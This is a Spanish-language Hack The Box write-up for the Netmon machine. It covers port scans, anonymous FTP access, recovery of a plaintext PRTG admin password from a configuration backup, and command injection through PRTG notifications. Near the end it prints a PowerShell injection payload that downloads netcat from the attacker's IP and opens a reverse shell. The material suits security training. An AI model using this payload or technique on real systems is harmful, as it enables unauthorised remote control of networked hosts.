Hack The Box - Netmon Writeup
NMAP
Al realizar un escaneo con nmap nos muestra servicios ftp, http y puertos de windows.root@sckull:~# nmap -sT -p- --min-rate 5000 10.10.10.152 -o tcp Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-06 18:59 GMT Warning: 10.10.10.152 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.152 Host is up (0.24s latency). Not shown: 32841 closed ports, 32683 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49673/tcp open unknown 50315/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 169.37 seconds root@sckull:~# nmap -sC -p 21,80,135,139,445 -o nmap-ports.scan 10.10.10.152 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-06 19:03 GMT Nmap scan report for 10.10.10.152 Host is up (0.16s latency). PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-02-19 11:18PM 1024 .rnd | 02-25-19 09:15PM inetpub | 07-16-16 08:18AM PerfLogs | 02-25-19 09:56PM Program Files | 02-02-19 11:28PM Program Files (x86) | 02-03-19 07:08AM Users |_02-25-19 10:49PM Windows | ftp-syst: |_ SYST: Windows_NT 80/tcp open http | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: |_clock-skew: mean: 48s, deviation: 0s, median: 47s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-06 19:03:57 |_ start_date: 2019-03-06 18:58:01 Nmap done: 1 IP address (1 host up) scanned in 10.87 seconds
FTP
Con las credenciales anonymous:anonymous obtenemos acceso y tambien la bandera user.txt.root@sckull:~# ftp 10.10.10.152 Connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls -lah 200 PORT command successful. 125 Data connection already open; Transfer starting. 11-20-16 09:46PM $RECYCLE.BIN 02-02-19 11:18PM 1024 .rnd 11-20-16 08:59PM 389408 bootmgr 07-16-16 08:10AM 1 BOOTNXT 02-03-19 07:05AM Documents and Settings 02-25-19 09:15PM inetpub 03-06-19 02:04PM 738197504 pagefile.sys 07-16-16 08:18AM PerfLogs 02-25-19 09:56PM Program Files 02-02-19 11:28PM Program Files (x86) 02-25-19 09:56PM ProgramData 02-03-19 07:05AM Recovery 02-03-19 07:04AM System Volume Information 02-03-19 07:08AM Users 02-25-19 10:49PM Windows 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-25-19 10:44PM Administrator 02-02-19 11:35PM Public 226 Transfer complete. ftp> cd Public 250 CWD command successful. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 07:05AM Documents 07-16-16 08:18AM Downloads 07-16-16 08:18AM Music 07-16-16 08:18AM Pictures 02-02-19 11:35PM 33 user.txt 07-16-16 08:18AM Videos 226 Transfer complete. ftp> bin 200 Type set to I. ftp> get user.txt local: user.txt remote: user.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 33 bytes received in 0.37 secs (0.0877 kB/s) ftp> root@sckull:~# cat user.txt dd5[...]5a5
ENUMERACION FTP
Al realizar una enumeracion a los directorios por medio de ftp encontramos un programa llamado 'PRTG Network Monitor' el cual funciona para monitoreo de red, el uso de ancho de banda o tiempo de actividad.HTTP - puerto 80
Realizando una busqueda por google nos encontramos con exploits para este monitor de red, pero para ello debemos de logearnos al portal web, el usuario y contraseña por default (prtgadmin:prtgadmin) no funcionan, por lo que yendo ún poco mas profundo encontramos un pequeño post en reddit que hablan acerca de un archivo 'PRTG Configuration.dat' que puede contener contraseñas que no estan encriptadas de igual forma en archivo 'PRTG Configuration.old'.
reddit/prtg_gave_away_some_of_your_passwords/
Sabiendo esto buscamos dentro de la maquina los archivos, por lo general se encuentran en el misma direccion que el programa (../Program Files/PRTG Network Monitor/PRTG configuration.dat) pero, al parecer el administrador cambio la direccion. Para enumerar archivos de manera rapida utilizamos Filezilla. Los archivos los pudimos encontrar en '/Users/All Users/Paessler/PRTG Network Monitor'.
Hicimos una busqueda de contraseñas dentro de los archivos y en 'PRTG Configuration.old.bak' encontramos una contraseña para el usuario 'prtgadmin'.
PrTg@dmin2018
Al intentar logearnos con las credenciales (prtgadmin:PrTg@dmin2018) el portal no nos deja, por lo que podemos ver el archivo en donde se encuentra la contraseña es un archivo backup y fue creado en el año de 2018, que tal si le cambiamos el año a la contraseña (PrTg@admin2018) al actual --> PrTg@dmin2018.
Tenemos una sesion abierta dentro del portal, ahora que estamos dentro podemos hacer inyeccion de comandos.
PRTG < 18.2.39 Command Injection Vulnerability
Nos dirigimos a Setup > Account Settings > Notifications
Creamos una nueva notificacion y marcamos la opcion de EXECUTE PROGRAM, dentro de los parametros escribimos lo siguiente:
C:\netcat.txt;powershell -c "wget http://10.10.12.122/nc.exe -OutFile C:\nc.exe; C:\nc.exe 10.10.12.122 7878 -e cmd"Antes de ejecutar el comando debemos de poner a la escucha nuestra maquina para poder descargar nc.exe (netcat), luego de esto ejecutamos nuestra notificacion (test). Para ejecutarlo debemos de ir a donde esta la lista de notificaciones selecionamos la nuestra y en la parte derecha presionamos la campanita para hacer un test.
Observamos por medio del servicio ftp que el archivo nc.exe se creó exitosamente en C:/nc.exe.
Y obtenemos una shell como administrador.
Y nuestra bandera de root.txt.














